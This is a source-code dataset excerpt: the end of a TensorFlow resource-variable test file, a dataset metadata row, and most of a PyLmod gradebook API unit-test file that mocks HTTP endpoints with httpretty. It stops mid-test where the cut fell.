expected = np.array([1, 13, 3, 14, 14, 6, 7, 20])
state_ops.scatter_nd_add(v, indices, updates)
self.assertAllClose(expected, v.numpy())
@test_util.run_in_graph_and_eager_modes
def testUnreadVariableInsideFunction(self):
v = resource_variable_ops.ResourceVariable(1.0)
@def_function.function
def assign():
v.assign(1.0)
graph = assign.get_concrete_function().graph
self.assertTrue(all(x.type != "ReadVariableOp"
for x in graph.get_operations()))
def testScatterNdSubStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(
[1, 2, 3, 4, 5, 6, 7, 8], dtype=dtypes.float32, name="sub")
indices = constant_op.constant([[4], [3], [1], [7]], dtype=dtypes.int32)
updates = constant_op.constant([9, 10, 11, 12], dtype=dtypes.float32)
expected = np.array([1, -9, 3, -6, -4, 6, 7, -4])
state_ops.scatter_nd_sub(v, indices, updates)
self.assertAllClose(expected, v.numpy())
def testScatterUpdateCast(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="update")
state_ops.scatter_update(v, [1], [3])
self.assertAllEqual([1.0, 3.0], v.numpy())
@test_util.run_in_graph_and_eager_modes
def testScatterUpdateInvalidArgs(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3], name="update")
# The exact error and message differ between graph construction (where the
# error is realized during shape inference at graph construction time) and
# eager execution (where the error is realized during kernel execution).
with self.assertRaisesRegexp(Exception, r"shape.*2.*3"):
state_ops.scatter_update(v, [0, 1], [0, 1, 2])
@test_util.run_in_graph_and_eager_modes
def testAssignIncompatibleShape(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3])
self.evaluate(v.initializer)
pattern = re.compile("shapes must be equal", re.IGNORECASE)
with self.assertRaisesRegexp(Exception, pattern):
self.evaluate(v.assign_add(1))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testCopyToGraphUninitialized(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3])
copy_to_graph = ops.Graph()
with copy_to_graph.as_default(): # Intentionally testing v1 behavior
copied = resource_variable_ops.copy_to_graph_uninitialized(v)
self.assertEqual(v.name, copied.name)
self.assertIsNone(copied.initializer)
def create_variant_shape_and_type_data(self):
variant_shape_and_type_data = (
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData())
variant_shape_and_type_data.is_set = True
stored_shape = tensor_shape.TensorShape([None, 4]).as_proto()
stored_dtype = dtypes.float32.as_datatype_enum
# NOTE(ebrevdo): shape_and_type lacks append() in some versions of protobuf.
variant_shape_and_type_data.shape_and_type.extend([
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleShapeAndType(
shape=stored_shape, dtype=stored_dtype)])
return variant_shape_and_type_data
@def_function.function
def create_constant_variant(self, value):
value = constant_op.constant(
tensor_pb2.TensorProto(
dtype=dtypes.variant.as_datatype_enum,
tensor_shape=tensor_shape.TensorShape([]).as_proto(),
variant_val=[
tensor_pb2.VariantTensorDataProto(
# Match registration in variant_op_registry.cc
type_name=b"int",
metadata=np.array(value, dtype=np.int32).tobytes())
]))
return value
# TODO(ebrevdo): Add run_in_graph_and_eager_modes once we can create
# EagerTensor constants with TensorProto inputs.
@test_util.run_in_graph_and_eager_modes()
def testVariantInitializer(self):
variant_shape_and_type_data = self.create_variant_shape_and_type_data()
value = self.create_constant_variant(3)
initializer = array_ops.fill([3], value)
resource_variable_ops._set_handle_shapes_and_types( # pylint: disable=protected-access
initializer, variant_shape_and_type_data,
graph_mode=not context.executing_eagerly())
v = resource_variable_ops.ResourceVariable(initializer)
read = array_ops.identity(v)
read_variant_shape_and_type = (
resource_variable_ops.get_eager_safe_handle_data(read))
self.assertEqual(
read_variant_shape_and_type, variant_shape_and_type_data)
gather = v.sparse_read([0])
gather_variant_shape_and_type = (
resource_variable_ops.get_eager_safe_handle_data(gather))
self.assertEqual(
gather_variant_shape_and_type, variant_shape_and_type_data)
# Make sure initializer runs.
if not context.executing_eagerly():
self.evaluate(v.initializer)
self.evaluate(read.op)
self.evaluate(gather.op)
@parameterized.parameters([
# batch_dims=0 (equivalent to tf.gather)
dict( # 2D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[2, 1], [0, 3]],
expected=[[8, 7], [6, 9]]),
dict( # 3D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[9, 7], [8, 6]], [[6, 9], [8, 8]]]),
dict( # 4D indices
batch_dims=0,
params=[8, 9],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[8, 9], [9, 8]], [[8, 8], [9, 9]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
# batch_dims=indices.shape.ndims - 1 (equivalent to
# tf.compat.v1.batch_gather)
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
# 0 < batch_dims < indices.shape.ndims - 1
dict( # 3D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[13, 11], [12, 10]], [[20, 23], [22, 22]]]),
dict( # 4D indices (1 batch dim)
batch_dims=1,
params=[[6, 7], [8, 9]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[6, 7], [7, 6]], [[6, 6], [7, 7]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
dict( # 4D indices (2 batch dims)
batch_dims=2,
params=[[[2, 3], [4, 5]], [[6, 7], [8, 9]]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[2, 3], [3, 2]], [[4, 4], [5, 5]]],
[[[7, 7], [6, 6]], [[8, 9], [9, 8]]]]),
])
@test_util.run_in_graph_and_eager_modes
def testGatherWithBatchDims(self, params, indices, batch_dims, expected):
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=var.dtype, batch_dims=batch_dims)
self.assertAllEqual(expected, result)
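  # A minimal illustrative helper (an addition, not part of the original
  # suite; the name `_example_gather_batch_dims` is an assumption) showing the
  # batch_dims rule exercised above: with batch_dims=1 the leading axis of
  # `params` and `indices` is a shared batch axis and a plain gather is
  # applied within each batch element.
  def _example_gather_batch_dims(self):
    params = constant_op.constant([[10, 11, 12, 13], [20, 21, 22, 23]])
    indices = constant_op.constant([[2, 1], [0, 3]])
    # Row 0 picks columns [2, 1] of [10, 11, 12, 13] -> [12, 11];
    # row 1 picks columns [0, 3] of [20, 21, 22, 23] -> [20, 23].
    result = array_ops.gather(params, indices, batch_dims=1)
    self.assertAllEqual([[12, 11], [20, 23]], result)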
@parameterized.parameters([
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=0,
output_shape=[2, 3, 8, 9, 10, 3, 4, 5, 6, 7]
# = indices.shape + params.shape[1:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=1,
output_shape=[2, 3, 8, 9, 10, 4, 5, 6, 7]
# = params.shape[:1] + indices.shape[1:] + params.shape[2:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
output_shape=[2, 3, 8, 9, 10, 5, 6, 7]
# = params.shape[:2] + indices.shape[2:] + params.shape[3:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 4, 9, 10],
batch_dims=3,
output_shape=[2, 3, 4, 9, 10, 6, 7]
# = params.shape[:3] + indices.shape[3:] + params.shape[4:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 4, 5, 10],
batch_dims=4,
output_shape=[2, 3, 4, 5, 10, 7]
# = params.shape[:4] + indices.shape[4:] + params.shape[5:]
),
])
@test_util.run_in_graph_and_eager_modes
def testGatherWithBatchDimsMatchesTensor(self, params_shape, indices_shape,
batch_dims, output_shape):
"""Checks that gather with batch_dims returns the correct shape."""
# Generate a `params` tensor with the indicated shape.
params_size = np.prod(params_shape)
params = np.reshape(np.arange(params_size, dtype=np.int32), params_shape)
# Generate an `indices` tensor with the indicated shape, where each index
# is within the appropriate range.
indices_size = np.prod(indices_shape)
indices = np.reshape(np.arange(indices_size, dtype=np.int32), indices_shape)
indices = indices % params_shape[batch_dims]
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
expected = array_ops.gather(
var.read_value(), indices, batch_dims=batch_dims)
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=var.dtype, batch_dims=batch_dims)
self.assertAllEqual(output_shape, result.shape.as_list())
self.assertAllEqual(expected, result)
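  # A minimal sketch (an addition, not part of the original tests) of the
  # output-shape rule spelled out in the parameter comments above:
  #   result.shape = params.shape[:batch_dims]
  #                  + indices.shape[batch_dims:]
  #                  + params.shape[batch_dims + 1:]
  # The helper name `_example_gather_output_shape` is an assumption.
  def _example_gather_output_shape(self):
    params = np.zeros([2, 3, 4, 5], dtype=np.int32)
    indices = np.zeros([2, 3, 7], dtype=np.int32)
    # With batch_dims=2: [2, 3] + [7] + [5] == [2, 3, 7, 5].
    result = array_ops.gather(params, indices, batch_dims=2)
    self.assertAllEqual([2, 3, 7, 5], result.shape.as_list())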
@parameterized.parameters([
dict(dtype=dtypes.bool),
dict(dtype=dtypes.int64),
dict(dtype=dtypes.half),
dict(dtype=dtypes.float32),
dict(dtype=dtypes.double),
])
@test_util.run_gpu_only
@test_util.run_in_graph_and_eager_modes
def testGatherWithDTypes(self, dtype):
if dtype == dtypes.bool:
params = constant_op.constant([False, True, False, True])
expected = constant_op.constant([[False, True], [False, True]])
else:
params = constant_op.constant([6, 7, 8, 9], dtype=dtype)
expected = constant_op.constant([[8, 7], [6, 9]], dtype=dtype)
indices = constant_op.constant([[2, 1], [0, 3]])
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=dtype)
self.assertAllEqual(expected, result)
class PerReplicaResourceHandleTest(test_util.TensorFlowTestCase):
def setUp(self):
super(PerReplicaResourceHandleTest, self).setUp()
cpus = config.list_physical_devices("CPU")
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration(),
])
def testAllowedDevices(self):
device0 = "/job:localhost/replica:0/task:0/device:CPU:0"
device1 = "/job:localhost/replica:0/task:0/device:CPU:1"
value0 = 1
value1 = 2
with context.eager_mode():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[], allowed_devices=[device0, device1])
with ops.device(device0):
assign0 = resource_variable_ops.assign_variable_op(handle, value0)
with ops.device(device1):
assign1 = resource_variable_ops.assign_variable_op(handle, value1)
with ops.control_dependencies([assign0, assign1]):
with ops.device(device0):
read0 = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
with ops.device(device1):
read1 = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
self.assertAllEqual(value0, read0)
self.assertAllEqual(value1, read1)
if __name__ == "__main__":
test.main()
| apache-2.0 | 8,965,684,115,641,290,000 | 41.245478 | 91 | 0.643434 | false |
amir-qayyum-khan/PyLmod | pylmod/tests/test_gradebook.py | 1 | 29583 | """
Verify gradebook API calls with unit tests
"""
import json
import tempfile
import time
import httpretty
import mock
from pylmod import GradeBook
from pylmod.exceptions import (
PyLmodUnexpectedData,
PyLmodNoSuchSection,
PyLmodFailedAssignmentCreation,
)
from pylmod.tests.common import BaseTest
class TestGradebook(BaseTest):
"""Validate defined gradebook methods in GradeBook class
"""
    # Unit tests legitimately need access to protected members
    # pylint: disable=protected-access
GRADEBOOK_ID = 1234
ASSIGNMENT_BODY = {
u'data':
[
{
u'assignmentId': 1,
u'categoryId': 1293820,
u'description': u'',
u'dueDate': 1372392000000,
u'dueDateString': u'06-28-2013',
u'gradebookId': 1293808,
u'graderVisible': True,
u'gradingSchemeId': 2431243,
u'gradingSchemeType': u'NUMERIC',
u'isComposite': False,
u'isHomework': False,
u'maxPointsTotal': 10.0,
u'name': u'Homework 1',
u'shortName': u'HW1',
u'userDeleted': False,
u'weight': 1.0
},
{
u'assignmentId': 2,
u'categoryId': 1293820,
u'description': u'',
u'dueDate': 1383541200000,
u'dueDateString': u'11-04-2013',
u'gradebookId': 1293808,
u'graderVisible': False,
u'gradingSchemeId': 16708851,
u'gradingSchemeType': u'NUMERIC',
u'isComposite': False,
u'isHomework': False,
u'maxPointsTotal': 100.0,
u'name': u'midterm1',
u'shortName': u'mid1',
u'userDeleted': False,
u'weight': 1.0
}
]
}
SECTION_BODY = {
'data':
{
'recitation': [
{
"name": "Unassigned",
"editable": False,
"members": None,
"shortName": "def",
"staffs": None,
"groupId": 1293925
},
{
"name": "Section 1",
"editable": False,
"members": None,
"shortName": "def",
"staffs": None,
"groupId": 123456
},
]
}
}
STUDENT_BODY = {
'data':
[
{
'accountEmail': '[email protected]',
'displayName': 'Alice',
'section': 'Unassigned',
'sectionId': 1293925,
'studentId': 1,
},
{
'accountEmail': '[email protected]',
'displayName': 'Bob',
'section': 'Section 1',
'sectionId': 123456,
'studentId': 2,
},
]
}
STAFF_BODY = {
u'data':
{
u'COURSE_ADMIN':
[
{
u'accountEmail': u'[email protected]',
u'displayName': u'Louie Duck',
},
],
u'COURSE_TA':
[
{
u'accountEmail': u'[email protected]',
u'displayName': u'Benjamin Franklin',
}
]
},
}
SIMPLE_STAFF_BODY = [
{
u'accountEmail': u'[email protected]',
u'displayName': u'Louie Duck',
u'role': 'COURSE_ADMIN',
},
{
u'accountEmail': u'[email protected]',
u'displayName': u'Benjamin Franklin',
u'role': 'COURSE_TA',
}
]
@staticmethod
def _get_grades():
"""Return a dictionary list of grades.
Since it has a dynamic time value these need to be generated
with a function as close to the response time as possible.
"""
return [
{
'studentId': 1,
'assignmentId': 1,
'mode': 2,
'comment': 'from MITx {0}'.format(time.ctime(time.time())),
'numericGradeValue': '1.1',
'isGradeApproved': False
},
{
'studentId': 2,
'assignmentId': 1,
'mode': 2,
'comment': 'from MITx {0}'.format(time.ctime(time.time())),
'numericGradeValue': '5.1',
'isGradeApproved': False
},
]
def _get_multigrade(self, approve_grades=False):
"""Get a list of spreadsheet rows as dictionaries
Get a list of spreadsheet row values to test submitting
grades in a spreadsheet to the LMod web service.
Args:
approve_grades (boolean): list of spreadsheet rows as
dictionaries
Returns: list - list of spreadsheet rows
"""
return [
{'assignmentId': 1,
'isGradeApproved': approve_grades,
'mode': 2,
'numericGradeValue': 2.2,
'studentId': 1},
{'assignmentId': 1,
'isGradeApproved': approve_grades,
'mode': 2,
'numericGradeValue': 1.1,
'studentId': None},
]
def _register_get_gradebook(self, send_data=True):
"""Register gradebook endpoint for API."""
body = {
u"message": u"",
u"status": 0,
u"data":
{
u"gradebookId": self.GRADEBOOK_ID,
u"uuid": self.GBUUID,
u"courseName": u"Test",
u"courseNumber": u"testingstuff",
u"membershipSource": u"stellar",
u"gradebookName": u"Gradebook for testingstuff"
}
}
if not send_data:
del body['data']
httpretty.register_uri(
httpretty.GET,
'{0}gradebook'.format(self.GRADEBOOK_REGISTER_BASE),
body=json.dumps(body)
)
def _register_get_options(self, send_data=True):
"""Handle get_options API call"""
if send_data:
body = json.dumps(
{'data': {'membershipQualifier': '/project/mitxdemosite'}}
)
else:
body = json.dumps({u'data': {u'nada': 'nothing'}})
httpretty.register_uri(
httpretty.GET,
'{0}gradebook/options/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=body
)
def _register_get_assignments(self):
"""Respond to assignment list requests"""
httpretty.register_uri(
httpretty.GET,
'{0}assignments/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(self.ASSIGNMENT_BODY)
)
def _register_create_assignment(self, body=''):
"""Handle assignment creation as needed"""
httpretty.register_uri(
httpretty.POST,
'{0}assignment'.format(self.GRADEBOOK_REGISTER_BASE),
body=json.dumps(body)
)
def _register_multi_grade(self, body=''):
"""Handle multigrade API call"""
httpretty.register_uri(
httpretty.POST,
'{0}multiGrades/{1}'.format(
self.GRADEBOOK_REGISTER_BASE, self.GRADEBOOK_ID
),
body=json.dumps(body)
)
def _register_get_sections(self):
"""Handle section getting API call"""
httpretty.register_uri(
httpretty.GET,
'{0}sections/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(self.SECTION_BODY)
)
def _register_get_students(self):
"""Handle student getting API call"""
httpretty.register_uri(
httpretty.GET,
'{0}students/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(self.STUDENT_BODY)
)
def _register_get_students_in_section(self):
"""Handle student getting API call"""
section = self.SECTION_BODY['data']['recitation'][0]['groupId']
students = [x for x in self.STUDENT_BODY['data']
if x['sectionId'] == section]
students_data = dict(data=students)
httpretty.register_uri(
httpretty.GET,
'{0}students/{1}/section/{2}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID,
section,
),
body=json.dumps(students_data)
)
def test_constructor(self):
"""Verify constructor does as expected without gbuuid (no remote API
call).
"""
# Strip off base URL to make sure it comes back
urlbase = self.URLBASE[:-1]
test_base = GradeBook(self.CERT, urlbase)
self.assertEqual(
test_base.urlbase,
self.URLBASE + 'service/gradebook/'
)
self.assertEqual(test_base._session.cert, self.CERT)
self.assertIsNone(test_base.gradebookid)
@httpretty.activate
def test_constructor_with_gbuuid(self):
"""Verify we can construct with GBUUID and properly add
self.gradebook_id
"""
self._register_get_gradebook()
test_base = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
self.assertEqual(test_base.gradebook_id, self.GRADEBOOK_ID)
# Also verify we made an API call
last_request = httpretty.last_request()
self.assertEqual(last_request.querystring, dict(uuid=[self.GBUUID]))
@httpretty.activate
def test_get_gradebook_id(self):
"""Verify get_gradebook_id works and sets the property as expected."""
self._register_get_gradebook()
test_gradebook = GradeBook(self.CERT, self.URLBASE)
gradebook_id = test_gradebook.get_gradebook_id(self.GBUUID)
self.assertEqual(gradebook_id, self.GRADEBOOK_ID)
last_request = httpretty.last_request()
self.assertEqual(last_request.querystring, dict(uuid=[self.GBUUID]))
# Remove data and assert exception raised
self._register_get_gradebook(False)
with self.assertRaises(PyLmodUnexpectedData):
test_gradebook.get_gradebook_id(self.GBUUID)
@httpretty.activate
def test_get_options(self):
"""Verify that we can get the options for a gradebook."""
self._register_get_options(True)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
options = gradebook.get_options(gradebook_id=self.GRADEBOOK_ID)
self.assertIn('membershipQualifier', options)
# check for no data
self._register_get_options(False)
options = gradebook.get_options(gradebook_id=self.GRADEBOOK_ID)
self.assertNotIn('membershipQualifier', options)
@httpretty.activate
def test_get_assignments(self):
"""Verify we can get assignments as requested"""
self._register_get_gradebook()
self._register_get_assignments()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
assignments = gradebook.get_assignments()
self.assertEqual(assignments, self.ASSIGNMENT_BODY['data'])
last_request = httpretty.last_request()
self.assertEqual(
last_request.querystring,
dict(
includeMaxPoints=['true'],
includeAvgStats=['false'],
includeGradingStats=['false']
)
)
# Check simple style
assignments = gradebook.get_assignments(simple=True)
self.assertEqual(
assignments,
[{'AssignmentName': x['name']}
for x in self.ASSIGNMENT_BODY['data']]
)
# Verify parameter handling
assignments = gradebook.get_assignments(
max_points=False, avg_stats=True, grading_stats=True
)
last_request = httpretty.last_request()
self.assertEqual(
last_request.querystring,
dict(
includeMaxPoints=['false'],
includeAvgStats=['true'],
includeGradingStats=['true']
)
)
@httpretty.activate
def test_get_assignment_by_name(self):
"""Verify grabbing an assignment by name."""
self._register_get_gradebook()
# Verify just with a list (no API)
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
static_assignments = [dict(name='blah', assignmentId=1)]
# No match
self.assertEqual(
(None, None),
gradebook.get_assignment_by_name('stuff', static_assignments)
)
# Match
self.assertEqual(
(1, static_assignments[0]),
gradebook.get_assignment_by_name(
'blah', static_assignments
)
)
# Verify we can get assignments via API and match
self._register_get_assignments()
assignment = self.ASSIGNMENT_BODY['data'][0]
self.assertEqual(
(assignment['assignmentId'], assignment),
gradebook.get_assignment_by_name(assignment['name'])
)
@httpretty.activate
def test_create_assignment(self):
"""Verify creating a new assignment."""
response_data = {'message': 'success'}
self._register_create_assignment(response_data)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
response = gradebook.create_assignment(
'Test Assign', 'test-assign', 1.0, 100.0, '11-04-2999'
)
self.assertEqual(response_data, response)
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps({
'name': 'Test Assign',
'shortName': 'test-assign',
'weight': 1.0,
'graderVisible': False,
'gradingSchemeType': 'NUMERIC',
'gradebookId': self.GRADEBOOK_ID,
'maxPointsTotal': 100.0,
'dueDateString': '11-04-2999',
})
)
@httpretty.activate
def test_delete_assignment(self):
"""Verify deleting a new assignment."""
response_data = {'message': 'success'}
httpretty.register_uri(
httpretty.DELETE,
'{0}assignment/1'.format(self.GRADEBOOK_REGISTER_BASE),
body=json.dumps(response_data)
)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
response = gradebook.delete_assignment(1)
self.assertEqual(response_data, response)
@httpretty.activate
def test_set_grade(self):
"""Verify the setting of grades is as we expect.
"""
response_data = {'message': 'success'}
httpretty.register_uri(
httpretty.POST,
'{0}grades/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(response_data)
)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
grade = self._get_grades()[0]
response = gradebook.set_grade(
assignment_id=grade['assignmentId'],
student_id=grade['studentId'],
grade_value=grade['numericGradeValue'],
isGradeApproved=False
)
self.assertEqual(response_data, response)
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(grade)
)
@httpretty.activate
def test_multi_grade(self):
"""Verify that we can set multiple grades at once
"""
response_data = {'message': 'success'}
self._register_multi_grade(response_data)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
grades = self._get_grades()
response = gradebook.multi_grade(grades)
self.assertEqual(response_data, response)
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(grades)
)
@httpretty.activate
def test_get_sections(self):
"""Verify we can get sections for a course."""
self._register_get_gradebook()
self._register_get_sections()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
sections = gradebook.get_sections()
self.assertEqual(sections, self.SECTION_BODY['data'])
# Check simple style
sections = gradebook.get_sections(simple=True)
expected_sections = gradebook.unravel_sections(
self.SECTION_BODY['data']
)
self.assertEqual(
sections,
[{'SectionName': x['name']}
for x in expected_sections],
)
@httpretty.activate
def test_get_staff(self):
"""Verify staff list is returned."""
httpretty.register_uri(
httpretty.GET,
'{0}staff/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(self.STAFF_BODY)
)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
staff = gradebook.get_staff(self.GRADEBOOK_ID)
self.assertEqual(staff, self.STAFF_BODY['data'])
# Check simple style
staff = gradebook.get_staff(self.GRADEBOOK_ID, simple=True)
expected_staff = gradebook.unravel_staff(self.STAFF_BODY)
simple_list = []
for member in expected_staff.__iter__():
simple_list.append({
'accountEmail': member['accountEmail'],
'displayName': member['displayName'],
'role': member['role'],
})
for member in staff:
self.assertIn(member, simple_list)
@httpretty.activate
def test_get_section_by_name(self):
"""Verify grabbing a section by name."""
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
# With match
self._register_get_sections()
section_type = 'recitation'
section = self.SECTION_BODY['data'][section_type][0]
# Add the type modifier we now add to the structure
section['sectionType'] = section_type
self.assertEqual(
(section['groupId'], section),
gradebook.get_section_by_name(section['name'])
)
# Without match
self._register_get_sections()
section = 'Nope'
self.assertEqual(
(None, None),
gradebook.get_section_by_name(section)
)
@httpretty.activate
def test_get_students(self):
"""Verify being able to get students for section/gradebook."""
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
self._register_get_students()
# Without section specified
students = gradebook.get_students()
self.assertEqual(students, self.STUDENT_BODY['data'])
# Simple data return (and upcasing mit.edu)
students = gradebook.get_students(simple=True)
mapped_data = []
for student in self.STUDENT_BODY['data']:
email = student['accountEmail']
if 'mit.edu' in email:
email = email.replace('mit.edu', 'MIT.EDU')
mapped_data.append(dict(
email=email,
name=student['displayName'],
section=student['section'],
))
self.assertEqual(mapped_data, students)
# With valid section specified
self._register_get_sections()
self._register_get_students_in_section()
section_name = self.SECTION_BODY['data']['recitation'][0]['name']
students = gradebook.get_students(
section_name=section_name
)
self.assertEqual(
students,
[x for x in self.STUDENT_BODY['data']
if x['section'] == section_name]
)
# With invalid section
with self.assertRaises(PyLmodNoSuchSection):
students = gradebook.get_students(section_name='nope')
@httpretty.activate
def test_get_students_by_email(self):
"""Verify being able to get students by e-mail"""
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
self._register_get_students()
real_student = self.STUDENT_BODY['data'][0]
# Match against passed in list
self.assertEqual(
gradebook.get_student_by_email(
real_student['accountEmail'],
students=self.STUDENT_BODY['data']
),
(real_student['studentId'], real_student)
)
# Get legitimate email
student = gradebook.get_student_by_email(
real_student['accountEmail']
)
self.assertEqual(student, (real_student['studentId'], real_student))
# And with non-existent student
self.assertEqual(
(None, None),
gradebook.get_student_by_email('cheese')
)
@httpretty.activate
def test_spreadsheet2gradebook_multi(self):
"""Verify that we can use a spreadsheet to set grades
"""
response_data = {'message': 'success'}
self._register_get_gradebook()
self._register_get_assignments()
self._register_get_students()
self._register_multi_grade(response_data)
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
# Create "spreadsheet" that doesn't require creating assignments.
spreadsheet = [
{'External email': '[email protected]', 'Homework 1': 2.2},
{'External email': 'cheese', 'Homework 1': 1.1},
]
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False,
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=False))
)
# Verify that we got the same grades, setting auto-approve = False
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=False))
)
# Verify that we got the same grades, setting auto-approve = False
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=False))
)
# Verify that we got the same grades, setting auto-approve = True
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=True
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=True))
)
# Verify that we got the same grades, setting auto-approve = True
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=True
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=True))
)
# Now run it when the assignment doesn't exist to exercise
# assignment creation code.
# Setup create to return an assignment ID as expected by the API
assignment_id = 3
self._register_create_assignment(
dict(data=dict(assignmentId=assignment_id))
)
spreadsheet = [
{'External email': '[email protected]', 'Homework 8': 2.2},
]
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email']
)
last_request = httpretty.last_request()
expected_response = self._get_multigrade(approve_grades=False)[0]
expected_response['assignmentId'] = assignment_id
self.assertEqual(
last_request.body,
json.dumps([expected_response])
)
# Now with assignment failing to be created
self._register_create_assignment({})
with self.assertRaises(PyLmodFailedAssignmentCreation):
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
